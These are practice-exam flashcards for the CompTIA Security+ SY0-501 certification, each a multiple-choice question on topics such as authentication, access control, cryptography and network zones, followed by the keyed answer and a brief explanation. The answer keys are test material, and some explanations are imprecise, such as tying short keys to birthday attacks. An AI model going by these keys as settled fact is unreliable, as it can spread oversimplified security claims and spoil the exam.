Practice Exam 2 Flashcards
CompTIA Security+ Review Guide: Exam SY0-501.
The most common form of authentication factor is a __________.
A. Password
B. Fingerprint
C. Smartcard
D. Token
A. Password
A password is the most common form of authentication. Fingerprints, smartcards, and tokens are widely used, but they aren’t the most widely used forms of authentication.
You’ve just received an email message that describes a new malicious code threat that’s ravaging the Internet. The message contains detailed information about the threat, describes the damage it can inflict, and provides instructions on how to remove it from your system. The message states that you can easily detect whether you’ve already been a victim of this threat by checking for the presence of three files in the \Windows\System32 folder. As a countermeasure, the message instructs you to delete these three files from your system to prevent further spread of the threat. What should your first action be, based on this message?
A. Locate and delete the identified files.
B. Perform a system backup.
C. Inform your network administrator.
D. Send the message to others in the office.
C. Inform your network administrator.
The best first response to a hoax message such as this is to inform your network administrator. Performing a system backup isn’t a bad idea, just not the best choice for your first response. Don’t follow the instructions or send the message to others.
Which of the following is not true of a NoSQL DBMS?
A. NoSQL uses a nonrelational database structure, such as hierarchical or multilevel nesting/referencing.
B. NoSQL cannot support Structured Query Language expressions.
C. NoSQL is well suited for managing extremely large collections of data.
D. NoSQL solutions typically do not support ACID.
B. NoSQL cannot support Structured Query Language expressions.
Some NoSQL DBMS systems support SQL expressions.
Which of the following represents the most secure system from a best practices perspective?
A. Removing all unneeded services and protocols
B. Using a new operating system right out of the box
C. Installing every available optional component
D. Using a firewall to provide boundary protection
A. Removing all unneeded services and protocols
The best solution is to remove all unneeded services and protocols. Using an operating system right out of the box and installing all components is never considered a secure option. Adding a firewall to a locked-down system is a security improvement but not a valid replacement for first removing things that aren’t needed on the server.
The technology used to prevent EMI from entering or leaving a specific room is known as __________.
A. Padded cell
B. TEMPEST
C. Site surveys
D. Directory service
B. TEMPEST
TEMPEST is the technology used to prevent EMI (electromagnetic interference) from entering or leaving a specific room. A padded cell is used to delay an intruder with a fake environment while that person’s activities are logged. Site surveys are used to detect where the signal from a wireless access point can be detected. A directory service is a searchable index of network resources.
Why is Internet email so vulnerable to attack?
A. It uses IP addresses to route messages.
B. Anyone can use email.
C. It requires adherence to standards.
D. It’s often sent using SMTP in clear form.
D. It’s often sent using SMTP in clear form.
Email is vulnerable to attack because it often uses SMTP (Simple Mail Transfer Protocol) and sends messages in clear form. Email’s use of IP addresses via the domain names found in email addresses, the fact that anyone can use email, and the fact that it requires adherence to standards doesn’t make email any more vulnerable than any other form of TCP/IP application.
The form of password attack that attempts to process every possible combination to discover passwords stored in an accounts database is known as what?
A. Dictionary attack
B. Brute-force attack
C. Birthday attack
D. Mathematical attack
B. Brute-force attack
A brute-force password attack attempts to process every possible combination to discover passwords stored in an accounts database. A dictionary attack is similar but uses a predefined set or list of passwords rather than every possible combination. A birthday attack (reverse hash matching) is a process most password attacks use, but it doesn’t imply that all possible password combinations are tried. A mathematical attack attempts to exploit the algorithm of a cryptography solution; it’s usually not associated with password attacks.
What is the most crucial part of enabling an investigator to reconstruct the correct order of criminal events from all the records and data collected from a crime scene during a forensic investigation?
A. Take hashes of collected data
B. Make notes of each task performed
C. Record time offset
D. Send out legal hold letters
C. Record time offset
As an event is recorded into a log file, it is encoded with a time stamp. The time stamp is pulled from the clock on the local device where the log file is written or sent with the event from the originating device if remote logging is performed. However, it is all too common for the clocks of the devices and computers in a network to be out of time sync to some degree. Recording the time offset is taking note of the difference between the device clock and the standard; it is used to adjust the time of log entries in order to sync events and activities across multiple network devices. Management of log times is essential for the chronological reconstruction of attack or compromise events.
What form of network segmentation should be used to prevent all cross-communication between devices?
A. Airgap
B. VLAN
C. Subnets
D. Virtualization
A. Airgap
Physical segmentation is when no links are established between networks. This is also known as an airgap. If there are no cables and no wireless connections between two networks, then a physical network segregation, segmentation, or isolation has been achieved. This is the most reliable means of prohibiting unwanted transfer of data.
What form of recovery site requires the least amount of downtime before mission-critical business operations can resume?
A. Cold
B. Warm
C. Hot
D. Offsite
C. Hot
A hot site requires the least amount of downtime before mission-critical business operations can resume, because it is a real-time mirror of the primary site.
In a MAC environment, when a user has clearance for assets but is still unable to access those assets, what other security feature is in force?
A. Principle of least privilege
B. Need to know
C. Privacy
D. Service-level agreement
B. Need to know
Need to know is the MAC environment’s granular access control method. The principle of least privilege is the DAC environment’s concept of granular access control. Privacy and SLAs aren’t forms of access control.
Sensitivity labels are used by which form of access control?
A. DAC
B. MAC
C. RBAC
D. TBAC
B. MAC
MAC (media/mandatory access control) uses sensitivity labels. DAC (discretionary access control) uses identity. RBAC (role-based access control) uses job descriptions. TBAC (task-based access control) uses work tasks.
The purpose of a replay attack is ___________.
A. Intercepting encrypted data
B. Preventing a server from responding to legitimate resource requests
C. Discovering passwords
D. Gaining access to resources based on a user’s credentials
D. Gaining access to resources based on a user’s credentials
The purpose of a replay attack is to gain access to resources based on a user’s credentials. A replay attack isn’t used to intercept encrypted data, prevent a server from responding to legitimate resource requests, or discover passwords.
Which of the following is not an example of symmetric cryptography?
A. AES
B. Blowfish
C. CAST-128
D. RSA
D. RSA
RSA is asymmetric. AES, Blowfish, and CAST-128 are symmetric.
Which of the following is not typically a legal agreement or commitment, but rather a more formal form of a reciprocal agreement or gentlemen’s handshake (neither of which is typically written down), and can be called a “letter of intent”?
A. MOU
B. ISA
C. SLA
D. BPA
A. MOU
An MOU (memorandum of understanding) is an expression of agreement or aligned intent, will, or purpose between two entities. An MOU is not typically a legal agreement or commitment, but rather a more formal form of a reciprocal agreement or gentlemen’s handshake (neither of which is typically written down). An MOU can also be called a “letter of intent.”
Which of the following is not considered a secure coding technique?
A. Using immutable systems
B. Using stored procedures
C. Code signing
D. Server-side validation
A. Using immutable systems
Programmers need to adopt secure coding practices, security experts need to train programmers, and security auditors need to monitor code throughout development for proper security elements.
Certificates have what single purpose?
A. Proving identity
B. Proving quality
C. Providing encryption security
D. Exchanging encryption keys
A. Proving identity
Certificates have the single purpose of proving identity. They don’t prove quality or provide encryption security, and they aren’t used to exchange encryption keys.
When a vendor releases a patch, which of the following is the most important?
A. Installing the patch immediately
B. Setting up automatic patch installation
C. Allowing users to apply patches
D. Testing the patch before implementation
D. Testing the patch before implementation
It is most important to test patches before installing them onto production systems. Otherwise, business tasks can be interrupted if the patch does not perform as expected. Never rush to install a patch if that means skipping testing. Do not automatically roll out patches; be sure to test them first. Do not give users the power to install patches; this should be managed by administrators.
In order to prevent any one administrator from taking full control over a cryptography system or performing fraud, which of the following solutions should not be implemented?
A. M of N control
B. Job rotation
C. Multiple key pairs
D. Separation of duties
B. Job rotation
Job rotation isn’t appropriate in this situation since it trains a single person to perform all administrative tasks and therefore provides each person with the ability to overrun the entire system. M of N controls, multiple key pairs, and separation of duties should be used to prevent a single person from compromising the entire system.
Why should generic, anonymous, or group accounts be prohibited?
A. No support for multifactor authentication
B. Not supported by LDAP
C. Inability to hold individuals accountable
D. Requires the use of a TPM
C. Inability to hold individuals accountable
Generic account prohibition is the rule that no generic or shared or anonymous accounts should be allowed in private networks or on any system where security is important. Only with unique accounts per subject is it possible to track the activities of individuals and be able to hold them accountable for their actions and any violations of company policy or the law.
Which of the following is a form of web security that encrypts web sessions for modern web servers and browsers?
A. SSH
B. S-HTTP
C. TLS
D. IPSec
C. TLS
TLS (Transport Layer Security) is the primary form of security used on modern web servers and browsers to encrypt web sessions. SSH (Secure Shell) and IPSec (Internet Protocol Security) are not directly related to web sessions. S-HTTP (Secure HTTP) is a legacy security protocol that is no longer supported by most web servers and browsers.
Which form of penetration testing is able to determine the risk level resulting from a standard employee who becomes dissatisfied with their job?
A. Gray box
B. Vulnerability analysis
C. Black box
D. White box
A. Gray box
Gray-box testing combines the two other approaches to perform an evaluation based on partial knowledge of the target environment. The results are a security evaluation from the perspective of a disgruntled employee. An employee has some knowledge of the organization and its security and has some level of physical and logical access.
When a cryptography solution uses keys that are easily guessed due to their short length, this allows for a form of attack known as ___________.
A. Eavesdropping attack
B. Birthday attack
C. Social engineering attack
D. Spoofing attack
B. Birthday attack
When a cryptography solution uses keys that are short, this allows for a form of attack known as a birthday attack. Eavesdropping, social engineering, and spoofing aren’t directly associated with cryptography attacks.
What is a cipher suite?
A. A standardized collection of authentication, encryption, and hashing algorithms used to set or define the parameters for a security network communication
B. A communication tunnel between two entities across an intermediary network
C. A storage process by which copies of private keys and/or secret keys are retained by a centralized management system
D. A process by which one communication is hidden inside another communication
A. A standardized collection of authentication, encryption, and hashing algorithms used to set or define the parameters for a security network communication
A cipher suite a standardized collection of authentication, encryption, and hashing algorithms used to set or define the parameters for a security network communication. A VPN is a communication tunnel between two entities across an intermediary network. Key escrow is a storage process by which copies of private keys and/or secret keys are retained by a centralized management system. Steganography is a process by which one communication is hidden inside another communication.
What is the programmatic activity of retrieving the value stored in a memory location by triggering the pulling of the memory based on its address or location as stored in a pointer?
A. DLL injection
B. Pointer dereferencing
C. Integer overflow
D. Pivot
B. Pointer dereferencing
Pointer dereferencing is the programmatic activity of retrieving the value stored in a memory location by triggering the pulling of the memory based on its address or location as stored in a pointer.
Which of the following is a form of malicious code injection attack where attackers are able to compromise a web server and inject their own malicious code into the content sent to other visitors?
A. Cross-site scripting
B. Form field manipulation
C. Birthday attack
D. Spoofing attack
A. Cross-site scripting
Cross-site scripting is a form of malicious code injection attack where attackers are able to compromise a web server and inject their own malicious code into the content sent to other visitors. Form field manipulation occurs when an attack changes elements in a web document on the client side before submitting results back to the web server. A birthday attack is associated with hashing. Spoofing is falsifying source information.
What form of federation trust should be established between domain entities A and B as well as B and C in order for members of each domain to be able to access the resources of all three of the linked domains?
A. One-way nontransitive trusts
B. One-way transitive trusts
C. Two-way nontransitive trusts
D. Two-way transitive trusts
D. Two-way transitive trusts
Two-way transitive trusts between domains A and B as well as B and C will link all three domains in such a way that members of any domain can access resources in any other domain.
TACACS, a solution similar to RADIUS, is based on what RFC?
A. RFC 1918
B. RFC 2828
C. RFC 1492
D. RFC 1087
C. RFC 1492
TACACS (Terminal Access Controller Access Control System) is based on RFC 1492. RFC 1918 defines private IP (Internet Protocol) addresses. RFC 2828 is the Internet security glossary. RFC 1087 is the “ethics and the Internet” document.
Certificates operate under the security concept of __________.
A. Principle of least privilege
B. Trusted third party
C. Separation of duties
D. Need to know
B. Trusted third party
Certificates operate under the security concept of trusted third party. Certificates aren’t associated with the principle of least privilege, separation of duties, or need to know.
Data is not always stored statically on a storage device. Thus, a range of security mechanisms are needed to provide reasonable protection over a range of events and circumstances. Which of the following is a false statement?
A. Data in-transit is data being communicated over a network connection.
B. Session encryption should be used to protect data in-transit.
C. Storage encryption, such as file encryption or whole-drive encryption, should be used to protect data at-rest.
D. Data in-use should be protected against disclosure with hashing.
D. Data in-use should be protected against disclosure with hashing.
Hashing is an integrity protecting mechanism, not a protection against disclosure. Data in-use is data being actively processed by an application. Open and active data is only secure if the logical and physical environment is secure. A well-established security baseline and physical access control are needed to provide reasonable protection for data in-use.
Which of the following is not an essential element in locking down a server?
A. Remove unneeded components.
B. Install updates and patches.
C. Perform user awareness training.
D. Configure the system according to company standards and baselines.
C. Perform user awareness training.
User awareness training is an essential part of security, but it isn’t directly related to locking down a server. Server lockdown should include removing unneeded components, installing updates and patches, and complying with company standards and baselines.
What type of security zone can be positioned so it operates as a buffer network between the secured private network and the Internet and can host publicly accessible services?
A. Honeypot
B. DMZ
C. Extranet
D. Intranet
B. DMZ
A DMZ (demilitarized zone) is a type of security zone that can be positioned so it operates as a buffer network between the secured private network and the Internet and can host publicly accessible services. A honeypot is a false network used to trap intruders; it isn’t used to host public services. An extranet is for limited partner access, not public. An intranet is the private secured network.
What certificate format is also a file extension and stores Base64 ASCII-encoded certificate information for server certificates, intermediate certificates, and private keys?
A. DER
B. PFX
C. P7B
D. PEM
D. PEM
PEM (Privacy-Enhanced Electronic Mail) is a certificate format that uses Base64 (ASCII) to encode the certificate details into a file with a .pem, .crt, .cer, or .key extension. PEM certificate files include “—–BEGIN CERTIFICATE—–” and “—–END CERTIFICATE—–” statements. PEM can be used to store server certificates, intermediate certificates, and private keys.
What is integrated into WPA-2 as a replacement for TKIP and is based on AES?
A. CCMP
B. IEEE 802.1x
C. LEAP
D. ECDHE
A. CCMP
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) was created to replace WEP and WPA’s TKIP. CCMP is based on AES. It’s the preferred standard security protocol of 802.11 wireless networking indicated by 802.11i.